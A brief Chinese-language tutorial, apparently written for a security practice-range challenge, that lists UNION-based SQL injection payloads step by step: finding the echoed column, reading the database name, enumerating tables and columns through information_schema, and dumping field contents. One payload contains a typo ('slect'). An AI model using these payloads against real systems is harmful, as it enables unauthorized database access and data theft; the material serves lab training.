简单的sql注入方法

简单的sql注入方法

---

对应题目好靶场平台-安全靶场-网络安全靶场

 1 union select 1,2,3,4,5。。。

发现回显

然后确定数据库名

1 union slect 1,2,database(),4,5

之后获取表名

1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema='数据库名' -- 

获取字段名

1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema='数据库名' and table_name='表名' -- 

获取内容

1 union select 1,字段(可以使用16进制过滤),3,4,5 from 数据库.表 -- 

其他sql注入大致如此